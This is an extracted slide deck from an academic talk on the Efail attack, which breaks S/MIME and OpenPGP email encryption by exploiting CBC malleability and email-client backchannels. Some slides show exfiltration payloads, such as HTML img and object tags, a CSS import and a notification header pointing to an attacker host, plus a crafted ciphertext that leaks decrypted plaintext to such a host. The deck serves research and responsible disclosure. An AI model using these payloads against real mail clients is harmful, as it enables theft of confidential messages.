efail attack and it its im implications
play

Efail attack and it its im implications Juraj Somorovsky Damian - PowerPoint PPT Presentation

Efail attack and it its im implications Juraj Somorovsky Damian Poddebniak 1 , Christian Dresen 1 , Jens Mller 2 , Fabian Ising 1 , Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jrg Schwenk 2 About this talk Efail:


  1. Efail attack and it its im implications Juraj Somorovsky Damian Poddebniak 1 , Christian Dresen 1 , Jens Müller 2 , Fabian Ising 1 , Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jörg Schwenk 2

  2. About this talk • Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels. Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 • Johnny, you are fired! Spoofing OpenPGP and S/MIME Signatures in Email . Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2019

  3. Email. 3

  4. Internet Message Format („Email“) From: Alice To: Bob Subject: Breaking News Congratulations, you have been promoted! 4

  5. Multipurpose Internet Mail Extensions (MIME) From: Alice To: Bob Subject: Breaking News Content-Type: text/plain Congratulations, you have been promoted! 5

  6. Multipurpose Internet Mail Extensions (MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/mixed; boundary="BOUNDARY" --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-type: application/pdf Contract... --BOUNDARY-- 6

  7. av2.com av1.com smtp.corp2 smtp.corp1 imap.corp2 imap.corp1 archive.corp1 archive.corp2

  8. av1.com smtp.corp1 imap.corp1 archive.corp1

  9. There is no such thing as “My Email”. 10

  10. av1.com Assumption: smtp.corp1 imap.corp1 Attacker has archive.corp1 access to emails!

  11. Motivation for using end-to-end encryption Insecure Transport • TLS might be used – we don’t know ! Nation state attackers (see also lecture given by Tibor) • Massive collection of emails • Snowden’s global surveillance disclosure Breach of email provider / email account • Single point of failure • Aren’t they reading/analyzing my emails anyway? 12

  12. Two competing standards OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies 13

  13. Signed Email (S/MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed ; boundary="BOUNDARY“; protocol="application/pkcs7- signature“ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA== --BOUNDARY-- 14

  14. Signed Email (S/MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed ; boundary="BOUNDARY“; protocol="application/pkcs7- signature“ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA== --BOUNDARY-- 15

  15. Signed Email (S/MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed ; boundary="BOUNDARY“; protocol="application/pkcs7- signature“ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA== --BOUNDARY-- 16

  16. Signed Email (PGP) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed; boundary="BOUNDARY"; protocol="application/pgp-signature “ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- iQE /BAEBAgApBQJbW1tqIhxCcnVjZSBXYXluZSA8YnJ1Y2V3YX… -----END PGP SIGNATURE----- --BOUNDARY-- 17

  17. Encrypted Email (PGP) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/encrypted; boundary="BOUNDARY"; protocol="application/pgp-encrypted"; --BOUNDARY Content-Type: application/octet-stream; name="encrypted.asc" Content-Description: OpenPGP encrypted message Content-Disposition: inline; filename="encrypted.asc" -----BEGIN PGP MESSAGE----- hQIMA0Zy9l4Cw+FaAQ//YewiWjMoX2BebbwJQJMJxvHRoF30NjkZe88m9kGts/tn DgkUPQEgJJJq /K1TwyAvR8tSLq… -----END PGP MESSAGE----- --BOUNDARY-- 18

  18. New published PGP public keys per month ? Known limitations!  Usability  Snowden Effekt  Enigmail  New keys at keyserver  Hard for S/MIME  Opsec von Snowden und thegruq  Ver- und Entschlüsselung nur in separater Anwendung! 19

  19. PGP and OpSec  Some tutorials recommend using PGP outside of email client. • https://gist.github.com/grugq/03167bed45e774 551155 • https://vimeo.com/56881481  Others recommended Enigmail in default settings (i.e. HTML switched on) 20

  20. 21

  21. Ok, so how about the security? ‘99 ‘06 ‘15 22

  22. Overview 1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions 23

  23. 2014: Enigmail won’t encrypt. https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/ 24

  24. 2017: Outlook includes plaintext in encrypted email. https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/ 25

  25. 2018: Enigmail/PEP won‘t encrypt. https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html 26

  26. Both standards use old crypto Both standards use old crypto Ciphertext C = Enc(M) C 1 valid/invalid C 2 valid/invalid … (repeated several times) M = Dec(C) 27

  27. Old crypto has no negative impact CBC / CFB modes of operation used, but their usage is not exploitable Old crypto has no negative impact Assumption: Email is non-interactive 29

  28. Backchannel • Any functionality that forces the email client to interact with the network <img src="http://efail.de"> <object data="ftp://efail.de"> • HTML/CSS <style>@import '//efail.de'</style> • JavaScript XSS cheat sheets Disposition-Notification-To: eve@evil.com ... Remote-Attachment-URL: http://efail.de • Email header X-Image-URL: http://efail.de • Attachment preview PDF, SVG, VCards, etc. … OCSP, CRL, intermediate certs • Certificate verification 30

  29. Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt Airmail MailMate Apple Mail Backchannels macOS found Mail App Outlook CanaryMail iOS K-9 Mail MailDroid Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail iCloud HushMail FastMail Mailfence ZoHo Mail Outlook.com Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile leak by default leak via bypass script execution ask user 31

  30. Attacker model 32

  31. Attacker model 33

  32. Overview 1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions 34

  33. S/MIME uses CBC Source: wikipedia • Cipher Block Chaining mode of operation • Not authenticated • Vulnerable to many attacks (TLS, XML Encryption, SSH) • Basic problem: malleability

  34. Malleability of CBC C 1 C 2 C 0 decryption decryption P 0 P 1 36

  35. Malleability of CBC C 1 C 2 C 0 ' decryption decryption Content-type: te xt/html\nDear Bob P 0 ' P 1 37

  36. Malleability of CBC C 1 C 2 C 0 ' decryption decryption Z ontent-type: te xt/html\nDear Bob P 0 ' P 1 38

  37. Malleability of CBC C 0 ⊕ P 0 C 1 C 2 decryption decryption 0000000000000000 xt/html\nDear Bob P 0 ' P 1 CBC Gadget 39

  38. Malleability of CBC C 0 ⊕ P 0 ⊕ P c C 1 C 2 decryption decryption <img src =” ev.il/ xt/html\nDear Bob P 0 ' P 1 40

  39. Malleability of CBC C 1 ' C 2 C 0 decryption decryption Content-type: te Z t/html\nDear Bob P 0 ' P 1 ' 41

  40. Malleability of CBC C 1 ' C 2 C 0 decryption decryption ???????????????? Z t/html\nDear Bob P 0 ' P 1 ' 42

  41. Practical Attack against S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted ???????????????? <img " " src="efail.de/ ???????????????? ???????????????? Content-type: te xt/html\nDear Sir or Madam, the se "> ???????????????? 43

  42. Practical Attack against S/MIME 44

  43. Demo

  44. Overview 1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions 46

Recommend


More recommend